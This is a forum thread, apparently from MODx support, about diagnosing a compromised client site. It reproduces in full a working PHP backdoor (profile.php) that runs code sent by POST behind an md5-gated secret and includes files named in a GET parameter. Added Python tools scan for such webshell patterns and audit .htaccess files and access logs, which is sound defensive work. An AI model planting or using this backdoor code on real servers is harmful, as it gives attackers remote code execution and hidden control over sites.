  • I built this site for a client, and launched it a few months ago. Recently, the client has made me aware of some very odd behavior. Apart from the front page, which seems to be working fine, every page on the site loads a blank screen. Viewing the source code shows a single line of enigmatic code:

    <div style="display:none">3054fa38dbdc58de23337c03e086c1e3</div>

    I’ve checked everything under the hood, and it all seems fine. The templates all look correct, the documents in the editor all load fine, the database (while excruciatingly slow to view via phpmyadmin on the host’s server) appears intact.

    I am unaware of any changes the client has made that could cause such a problem, and I doubt they would have the knowledge to make any such change anyway. I’ve told them to stick to editing documents and to stay out of the rest of the manager. The site is hosted on a shared server.

    The site in question is: http://vicphysics.org
    An example problem page is: http://www.vicphysics.org/photocontest.html

    Some details:

    MODx version: 0.9.6
    MySQL version: 5.0.51a
    PHP version: 5.2.3
    Phpinfo: http://vicphysics.org/phpinfo.php
    Apache version: 2.2.4

    Please let me know if there is any other information that would be helpful. Thank you in advance for any help you can offer!
    • Is there, by chance, an index.htm file? I see there’s an old index.html file there.

      Take a close look at your .htaccess file. Maybe your host (or your client) has overwritten or deleted it.

      Another possibility is a host-added php.ini file.


        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
      • Thanks for the reply.

        Yes there is an index.html. This is the old, obsolete site which is flat HTML. We have kept it there for users who refuse to upgrade from MSIE6 and have some problems viewing the new MODx site (the client refused to pay me for the inordinate amount of time it would have taken to jerry-rig the site to work properly in IE6). I use the .htaccess to load the index.php by default, but still allow users access to the old site by manually entering the index.html on the url.

        I can post the content of the .htaccess file here, if that’s not a security risk.

        There doesn’t appear to be a php.ini file in the root directory.

        Thanks for the help!
        • The reason I asked about index.htm (as opposed to .html) is that requesting vicphysics.org/index.htm produces the empty page and it’s unlikely that that goes through MODx.

          There could be a php.ini file above or below the modx root directory which might apply. Sometimes php.ini will have directives on how various files should be served.

          If there’s anything sensitive in the .htaccess file, you can rewrite that part before posting it.

          • Here’s the .htaccess:

            DirectoryIndex index.php index.html
            
            # MODx supports Friendly URLs via this .htaccess file. You must serve web
            # pages via Apache with mod_rewrite to use this functionality, and you must
            # change the file name from ht.access to .htaccess.
            #
            # Make sure RewriteBase points to the directory where you installed MODx.
            # E.g., "/modx" if your installation is in a "modx" subdirectory. If you have
            # problems with your .htaccess working at all, try un-commenting the first 
            # line above the "RewriteEngine On" directive.
            #
            # You may choose to make your URLs non-case-sensitive by adding a NC directive
            # to your rule: RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA,NC]
            
            #Options +FollowSymlinks
            RewriteEngine On
            RewriteBase /
            
            
            
            # Rewrite www.domain.com -> domain.com -- used with SEO Strict URLs plugin
            #RewriteCond %{HTTP_HOST} .
            #RewriteCond %{HTTP_HOST} !^www.vicphysics.org\.com [NC]
            #RewriteRule (.*) http://www.vicphysics.org/$1 [R=301,L]
            #
            # or for the opposite domain.com -> www.domain.com use the following
            # >>> DO NOT USE BOTH THE ABOVE AND BELOW <<<
            #
            #RewriteCond %{HTTP_HOST} .
            #RewriteCond %{HTTP_HOST} !^www\.example-domain-please-change\.com [NC]
            #RewriteRule (.*) http://www.example-domain-please-change.com/$1 [R=301,L]
            
            
            
            # Rewrite secure requests properly to prevent SSL cert warnings, e.g. prevent 
            # https://www.domain.com when your cert only allows https://secure.domain.com
            #RewriteCond %{SERVER_PORT} !^443
            #RewriteRule (.*) https://www.vicphysics.org/$1 [R=301,L]
            
            
            
            # The Friendly URLs part
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]
            
            
            
            # Make sure .htc files are served with the proper MIME type, which is critical # for XP SP2. Un-comment if your host allows htaccess MIME type overrides.
            
            #AddType text/x-component .htc
            
            
            
            # If your server is not already configured as such, the following directive
            # should be uncommented in order to set PHP's register_globals option to OFF.
            # This closes a major security hole that is abused by most XSS (cross-site
            # scripting) attacks. For more information: http://php.net/register_globals
            #
            # To verify that this option has been set to OFF, open the Manager and choose
            # Reports -> System Info and then click the phpinfo() link. Do a Find on Page
            # for "register_globals". The Local Value should be OFF. If the Master Value
            # is OFF then you do not need this directive here.
            #
            # IF REGISTER_GLOBALS DIRECTIVE CAUSES 500 INTERNAL SERVER ERRORS :
            #
            # Your server does not allow PHP directives to be set via .htaccess. In that
            # case you must make this change in your php.ini file instead. If you are
            # using a commercial web host, contact the administrators for assistance in
            # doing this. Not all servers allow local php.ini files, and they should
            # include all PHP configurations (not just this one), or you will effectively
            # reset everything to PHP defaults. Consult www.php.net for more detailed
            # information about setting PHP directives.
            
            php_flag register_globals Off
            
            
            
            # For servers that support output compression, you should pick up a bit of
            # speed but un-commenting the following lines.
            
            #php_flag zlib.output_compression On
            #php_value zlib.output_compression_level 5
            
            
            
            # The following directives stop screen flicker in IE on CSS rollovers. If
            # needed, un-comment the following rules. When they're in place, you may have
            # to do a force-refresh in order to see changes in your designs.
            
            #ExpiresActive On
            #ExpiresByType image/gif A2592000
            #ExpiresByType image/jpeg A2592000
            #ExpiresByType image/png A2592000
            #BrowserMatch "MSIE" brokenvary=1
            #BrowserMatch "Mozilla/4.[0-9]{2}" brokenvary=1
            #BrowserMatch "Opera" !brokenvary
            #SetEnvIf brokenvary 1 force-no-vary
            
            
            
            AuthName vicphysics.org
            AuthUserFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.pwd
            AuthGroupFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.grp
            
            DirectoryIndex index.php index.html index.htm
            
            #Options +FollowSymlinks
            
            RewriteEngine On
            
            RewriteBase /
            
            # The Friendly URLs part
            
            RewriteCond %{REQUEST_FILENAME} !-f
            
            RewriteCond %{REQUEST_FILENAME} !-d
            
            RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]


            I don’t think there’s anything sensitive in there. It’s a bit of a mess though...

            There’s no index.htm file in the root directory. Where else might I look for a host added php.ini file?

            Thanks again
            • The typical FURL part looks like this:

              # The Friendly URLs part
              RewriteCond %{REQUEST_FILENAME} !-f
              RewriteCond %{REQUEST_FILENAME} !-d
              RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]


              Is the profile.php thing something you put in?

              For starters, you could try turning off FURLS in the manager and comment out the FURL code in .htaccess to see what that gets you.

              It does sound like a FURL problem, BTW.
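An added example, not code from the thread or from MODx: a small Python audit of a .htaccess file that flags RewriteRule targets other than the stock index.php, duplicated RewriteEngine/RewriteBase/DirectoryIndex directives (a sign that a second block was appended to the file), and Auth* directives worth confirming. The sample .htaccess is a condensed, constructed version of the one posted above with the real filesystem paths replaced; the expected target and severity labels are my own assumptions.

```python
"""Audit a MODx-style .htaccess for rewrite rules that route requests through an
unexpected script, and for directives that should only appear once.
Added example, not MODx code; rules and severities are the author's assumptions."""
import re
from typing import Dict, List, NamedTuple

# MODx's stock Friendly URL rule rewrites to index.php?q=$1 (assumed expected target).
EXPECTED_FURL_TARGET = "index.php"

# Directives a stock MODx .htaccess carries exactly once; a repeat suggests an appended block.
SINGLETON_DIRECTIVES = ("RewriteEngine", "RewriteBase", "DirectoryIndex")


class Finding(NamedTuple):
    line: int
    severity: str  # "high", "warn" or "info"
    message: str


def audit_htaccess(text: str) -> List[Finding]:
    findings: List[Finding] = []
    seen: Dict[str, int] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0]

        if directive in SINGLETON_DIRECTIVES:
            if directive in seen:
                findings.append(Finding(lineno, "warn",
                    f"{directive} repeated (first seen on line {seen[directive]}); file may have been appended to"))
            else:
                seen[directive] = lineno

        if directive == "RewriteRule" and len(parts) >= 3:
            target = parts[2]
            if re.match(r"https?://", target):
                continue  # external redirect, a different concern
            script = target.lstrip("/").split("?", 1)[0]
            if script and script != EXPECTED_FURL_TARGET:
                findings.append(Finding(lineno, "high",
                    f"RewriteRule sends requests to {script!r} instead of {EXPECTED_FURL_TARGET!r}"))
            # A script name passed as a query parameter points at an include()-style dispatcher.
            if re.search(r"[?&]\w+=[^&]*\.php", target):
                findings.append(Finding(lineno, "high",
                    "rewrite target passes a script name as a query parameter"))

        if directive in ("AuthUserFile", "AuthGroupFile") and len(parts) >= 2:
            findings.append(Finding(lineno, "info",
                f"{directive} points at {parts[1]}; confirm this was intended"))
    return findings


# Constructed sample: shape of the posted file, real paths replaced.
SAMPLE_HTACCESS = """\
DirectoryIndex index.php index.html
RewriteEngine On
RewriteBase /
# The Friendly URLs part
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]
php_flag register_globals Off
AuthName example.org
AuthUserFile /path/to/_vti_pvt/service.pwd
DirectoryIndex index.php index.html index.htm
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]
"""

# Constructed sample: the stock MODx Friendly URL block, which should produce no findings.
STOCK_FURL = """\
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
"""

if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {f.line:>3} [{f.severity}] {f.message}")
```

Run it against the live file (`audit_htaccess(open(".htaccess").read())`) after any suspicious change; the "high" findings are the ones that mean traffic is being routed through a script MODx did not ship.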
              • I just had a quick look at the profile.php file. I don’t recall putting it in there specifically. Here’s the code:

                <?php
                error_reporting(0); // silence all PHP errors and notices so nothing shows up on the page
                
                if (file_exists('assets/public/functions.php')) { // pulls in a second file from a directory not discussed above
                	include('assets/public/functions.php');
                }
                
                if (md5($_POST['4a2faa4b']) == '3054fa38dbdc58de23337c03e086c1e3') { // gate: only a client that knows the secret POST value passes
                	$test_func = create_function('', urldecode($_POST['f'])); // builds a function from PHP code supplied in POST 'f'
                	$test_func(); // ...and runs it: arbitrary code execution for whoever knows the secret
                }
                
                if (isset($_GET['rewriter_request'])) { // normal visitors arrive here via the .htaccess rewrite
                	chdir($_GET['rewriter_request']); // chdir()/include() of a raw GET parameter: any readable path can be included
                	include($_GET['rewriter_request']); // hands the request on to index.php so the site keeps appearing to work
                } else {
                	$request_parts = parse_url($_SERVER['REQUEST_URI']);
                	if ($request_parts['path'] == '/profile.php') { exit(); }
                	$request_path = '.'.$request_parts['path'];
                	if (substr($request_path, -1) == '/') {
                		$index_files = array();
                		if ($handle = opendir($request_path)) {
                			while (false !== ($file = readdir($handle))) {
                				if (preg_match('/index\.html*/i', $file) || preg_match('/index\.php[345]*/i', $file)) {
                					$index_files[filemtime($file)] = $file;
                				}
                			}
                			closedir($handle);
                		}
                		if (count($index_files) > 0) {
                			krsort($index_files);
                			$request_path = $request_path.reset($index_files);
                			chdir(dirname($request_path));
                			include(basename($request_path));
                		} else {
                			header('HTTP/1.0 404 Not found');
                		}
                	} else {
                		if (file_exists($request_path)) { 
                			chdir(dirname($request_path));
                			include(basename($request_path)); 
                		} else {
                			header('HTTP/1.0 404 Not found');
                		}
                	}
                }
                ?>


                Notice the code on line 8 - that string is what appears in the source of all the pages that aren’t displayed! This must have something to do with the problem.

                I just tried renaming it to profile-temp.php to see if it had any effect, but it seems the host is having problems right now, as the site is giving a database error whether the profile.php is renamed or not.

                Does the source of the profile.php suggest anything to you? (I’m not a php programmer - I know just enough to get MODx and snippets working).
                • It’s not my area of expertise, but it could be a cross-site hacking attempt.

                  See what’s in assets/public/functions.php. It may give you a clue about what’s going on.

                  That md5 section basically says that if the browser receives a request with the appropriate string in the $_POST array, it should create a function with the code sent in the ’f’ variable of the $_POST array and then execute it. Kind of a scary prospect, although it could be legit. My 0.9.6 installs are not current but there’s no assets/public directory in them at all. Do you have SMF attached to your site? I think it uses a profile.php script.

                  I would rename the .htaccess file, for now, and create a new one with just the normal rewrite code I gave above and keep an eye on it to see if it changes back. That would be a sign that someone is messing with you.

                  Hopefully, someone who knows more about this than I do will chime in.


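The two things picked out of profile.php above (the md5 gate on a $_POST value, and create_function() on request data), together with the chdir()/include() of a raw $_GET parameter, are recognisable patterns that can be searched for across a whole web root. An added example, not code from the thread or from MODx: a Python scanner that flags them, run over a constructed file shaped like the posted profile.php and over a constructed benign front controller. The rule names, the regexes and the "probable backdoor" combination are my own heuristics.

```python
"""Scan PHP source for webshell indicators: a secret gate (hash of a request value
compared against a literal), dynamic code execution from request data, include()
or chdir() of a request parameter, obfuscated eval, and silenced errors.
Added example; rules are heuristics chosen by the author, not MODx code."""
import re
from typing import List, NamedTuple

REQUEST_VAR = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

RULES = [
    # md5($_POST['x']) == 'hexliteral'  (the gate seen in profile.php)
    ("hash_gate", re.compile(
        r"\b(?:md5|sha1|crc32)\s*\(\s*" + REQUEST_VAR + r".*?\)\s*={2,3}\s*['\"][0-9a-fA-F]{8,}['\"]")),
    # create_function/eval/assert fed (directly or via a wrapper) from request data
    ("dynamic_exec", re.compile(
        r"\b(?:create_function|eval|assert)\s*\(.*" + REQUEST_VAR)),
    # include($_GET['x']) / require(urldecode($_POST['x']))
    ("include_from_request", re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(\s*(?:urldecode\s*\(\s*)?" + REQUEST_VAR)),
    ("chdir_from_request", re.compile(r"\bchdir\s*\(\s*" + REQUEST_VAR)),
    # eval(base64_decode(...)) style packers
    ("obfuscated_exec", re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:gzinflate|base64_decode|str_rot13|gzuncompress)\s*\(")),
    ("errors_silenced", re.compile(r"\berror_reporting\s*\(\s*0\s*\)")),
]


class Indicator(NamedTuple):
    line: int
    rule: str
    excerpt: str


def scan_php(source: str) -> List[Indicator]:
    hits: List[Indicator] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append(Indicator(lineno, name, line.strip()))
    return hits


def is_probable_backdoor(source: str) -> bool:
    """Execution of request-supplied code is a backdoor on its own; a hash gate
    plus include-from-request is the dispatcher shape seen in profile.php.
    error_reporting(0) alone is too common in legitimate code to count."""
    rules = {h.rule for h in scan_php(source)}
    if rules & {"dynamic_exec", "obfuscated_exec"}:
        return True
    return "hash_gate" in rules and "include_from_request" in rules


# Constructed sample shaped like the posted profile.php (secret and hash are illustrative).
SUSPECT_PHP = r"""<?php
error_reporting(0);
if (md5($_POST['4a2faa4b']) == '3054fa38dbdc58de23337c03e086c1e3') {
    $f = create_function('', urldecode($_POST['f']));
    $f();
}
if (isset($_GET['rewriter_request'])) {
    chdir($_GET['rewriter_request']);
    include($_GET['rewriter_request']);
}
"""

# Constructed benign front controller: reads a GET parameter but never executes or includes it.
CLEAN_PHP = r"""<?php
define('MODX_API_MODE', false);
include_once 'manager/includes/config.inc.php';
$q = isset($_GET['q']) ? $_GET['q'] : '';
echo htmlspecialchars($q);
"""

if __name__ == "__main__":
    for hit in scan_php(SUSPECT_PHP):
        print(f"line {hit.line}: {hit.rule}: {hit.excerpt}")
    print("probable backdoor:", is_probable_backdoor(SUSPECT_PHP))
```

To sweep a site, walk the web root and call `scan_php()` on every .php file; anything that trips `is_probable_backdoor()` deserves the same treatment as profile.php, and the `include_from_request`/`chdir_from_request` hits on their own still mark files that will include whatever path a visitor names.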
                  • yep, definitely a very strange .htaccess file. You can also download a fresh modx version and upload that default .htaccess file, overwriting the current one.

                    URLs like http://vicphysics.org/index.php?id=145 work fine (no rewriting)
                    • I think WordPress also uses a profile.php file.

                      If you don’t have WordPress or SMF, or any other foreign addition to your site, though, it’s much more likely that this is malicious.

                      You might also want to check your visitors log in cPanel (or whatever) to see if there is a particular suspicious visitor asking for a nonexistent page over and over.

                      I would also mention this to your hosting service if you can’t find any reason for the profile.php file being there (include that md5 section in your message to them).


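An added example, not code from the thread or from MODx: a Python triage of Apache combined-format access log lines for the two things the reply above suggests checking, a client repeatedly asking for pages that do not exist, and POST requests to profile.php, which ordinary visitors never send (the rewrite rule routes them there with GET). The log lines are constructed, the client addresses are from documentation ranges, and the threshold of five 404s is an assumption.

```python
"""Triage Apache combined-format access log lines for repeated 404s per client and
for POSTs to a script that should never receive them. Added example with constructed
log lines; the suspect-script list and the 404 threshold are the author's assumptions."""
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


class Entry(NamedTuple):
    ip: str
    method: str
    path: str  # query string stripped
    status: int


def parse_line(line: str) -> Optional[Entry]:
    """Return the fields we need, or None for a line that is not combined-format."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    return Entry(m["ip"], m["method"], m["path"].split("?", 1)[0], int(m["status"]))


def triage(lines: List[str],
           suspect_scripts: Tuple[str, ...] = ("/profile.php",),
           not_found_threshold: int = 5) -> Dict[str, List[str]]:
    entries = [e for e in (parse_line(l) for l in lines) if e is not None]
    not_found = Counter(e.ip for e in entries if e.status == 404)
    posters: Dict[str, Set[str]] = defaultdict(set)
    for e in entries:
        if e.method == "POST" and e.path in suspect_scripts:
            posters[e.path].add(e.ip)
    return {
        # clients probing for pages that do not exist
        "repeat_404_clients": [ip for ip, n in not_found.most_common() if n >= not_found_threshold],
        # clients that POSTed to the suspect script; these are the ones to hand to the host
        "post_to_suspect_script": sorted({ip for ips in posters.values() for ip in ips}),
    }


# Constructed sample: one ordinary visitor, one client probing and then POSTing to profile.php.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Jun/2009:09:01:10 +1000] "GET / HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Jun/2009:09:01:12 +1000] "GET /photocontest.html HTTP/1.1" 200 6210 "http://www.example.org/" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Jun/2009:09:01:15 +1000] "GET /missing.gif HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jun/2009:03:14:07 +1000] "GET /wp-login.php HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:14:08 +1000] "GET /phpMyAdmin/ HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:14:09 +1000] "GET /admin/config.php HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:14:10 +1000] "GET /wp-admin/ HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:14:11 +1000] "GET /assets/public/functions.php HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:16:40 +1000] "POST /profile.php HTTP/1.1" 200 41 "-" "-"',
    '203.0.113.5 - - [10/Jun/2009:03:16:52 +1000] "POST /profile.php HTTP/1.1" 200 1320 "-" "-"',
]

if __name__ == "__main__":
    for key, ips in triage(SAMPLE_LOG).items():
        print(f"{key}: {', '.join(ips) or 'none'}")
```

With a real log, read the file into a list and pass it to `triage()`; the POST entries are the strongest evidence, since the backdoor in profile.php only does anything on a POST carrying the secret, and their timestamps bracket when the site was under someone else's control.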